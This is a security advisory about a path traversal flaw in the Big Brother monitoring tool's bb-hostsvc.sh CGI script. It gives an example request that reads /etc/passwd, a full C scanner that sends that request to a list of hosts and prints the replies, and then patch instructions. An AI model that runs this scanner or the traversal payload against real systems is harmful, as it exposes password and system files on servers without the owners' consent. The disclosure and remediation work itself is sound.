|
Vulnerability Big Brother Affected Big Brother up tp and including 1.4H Description Eric Hines posted following. With code below you can view the contents of any file on the remote system including /etc/passwd or /etc/shadow. This was identified and Proof of Concept by Safety and Loki [LoA]. The problem exists in the code where $HOSTSVC does not do authenticity checking for its assigned variable. ---- snip ---- # get the color of the status from the status file set `$CAT "$BBLOGS/$HOSTSVC" | $HEAD -1` >/dev/null 2>&1 BKG="$1" ---- snap ---- Example: http://www.bb4.com/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd Here's the scanner for this vulnerability: /* * * 2000-07-11 * * Ripped from phfscan.c * Big Brother Vulnarability scanner. * Scans for /cgi-bin/bb-hostsvc.sh. * If it exists you might be able to read files from * the system. Good luck. * * * Author: Safety@IRCnet who also discovered the bug. * Safety@LinuxMail.ORG * * * Credits: #roothat, #vastervik, #smile, Loki, crimson, self, * Bjurr, Metoo, and everyone else who think they should * be on this list. * * Special Thanks goes to Loki who are going to host and design * my homepage. * * * Usage: * * ./bbscan < hostlist > outputfile * */ #include <sys/stat.h> #include <sys/types.h> #include <termios.h> #include <unistd.h> #include <stdio.h> #include <fcntl.h> #include <sys/syslog.h> #include <sys/param.h> #include <sys/times.h> #ifdef LINUX #include <sys/time.h> #endif #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/signal.h> #include <arpa/inet.h> #include <netdb.h> int FLAG = 1; int Call(int signo) { FLAG = 0; } main (int argc, char *argv[]) { char host[100], buffer[1024], hosta[1024],FileBuf[8097]; int outsocket, serv_len, len,X,c,outfd; struct hostent *nametocheck; struct sockaddr_in serv_addr; struct in_addr outgoing; char bbvuln[]="GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd\n\n"; while(fgets(hosta,100,stdin)) { if(hosta[0] == '\0') break; hosta[strlen(hosta) -1] = '\0'; write(1,hosta,strlen(hosta)*sizeof(char)); write(1,"\n",sizeof(char)); outsocket = socket (AF_INET, SOCK_STREAM, 0); memset (&serv_addr, 0, sizeof (serv_addr)); serv_addr.sin_family = AF_INET; nametocheck = gethostbyname (hosta); /* Ugly stuff to get host name into inet_ntoa form */ (void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0], sizeof (outgoing.s_addr)); strncpy(host, inet_ntoa (outgoing), 100); serv_addr.sin_addr.s_addr = inet_addr (host); serv_addr.sin_port = htons (80); signal(SIGALRM,Call); FLAG = 1; alarm(10); X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr)); alarm(0); if(FLAG == 1 && X==0){ write(outsocket,bbvuln,strlen(bbvuln)*sizeof(char)); while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X); } close (outsocket); } return 0; } Solution BB4 Technologies has already been notified and a patch is already out. It can be Downloaded from http://www.bb4.com/download.html Required only on hosts that are defined as BBDISPLAY. Don't forget hosts that were at one point BBDISPLAY but were turned into a client only host afterwards. 1) If you have BBLOGSTATUS=DYNAMIC set in etc/bbdef.sh, then download BB 1.4h2 and extract bb-hostsvc.sh. Replace the script in the cgi-bin and set the BBHOME variable in the bb-hostsvc.sh script. Make sure the script has the proper permissions. 2) If you have BBLOGSTATUS=STATIC or BBLOGSTATUS=TEXT set in etc/bbdef.sh, then just remove the bb-hostsvc.sh from the cgi-bin directory as it is not required for these setups. 3) Set BBLOGSTATUS=STATIC in bbdef.sh and remove the script as described in 2). Jake Schleich found that by just downloading the new 1.4h2 and running the bbconfig and filling in the variables, it overwrote the offending file without me having to reinstall the entire thing; a pain when it comes to reconfiguring. It asks which files it will overwrite in the cgi-bin, you just say no to the custom ones(if you have replaced a few of the default bb cgi's with /ext released versions as I have) and replace the offending file(s). So in short, the bbconfig script will fix the problem without a rebuild.